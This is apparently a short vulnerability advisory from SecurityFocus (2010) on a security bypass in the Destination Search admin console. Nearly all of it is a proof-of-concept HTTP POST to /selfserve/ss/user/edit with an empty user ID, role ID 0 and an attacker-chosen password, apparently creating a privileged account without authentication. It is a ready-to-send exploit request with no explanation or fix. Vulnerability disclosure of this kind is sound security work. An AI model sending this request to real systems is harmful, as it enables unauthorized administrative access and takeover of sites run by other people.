Destination Search Admin Console Security Bypass Vulnerability

The following proof of concept is available:

POST /selfserve/ss/user/edit HTTP/1.0
Host: ds.example.com
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Length: 91

userId=&name=malicious&_status=on&password=malicious123&roleId=0&editListing=all&condition=all

Copyright 2010, SecurityFocus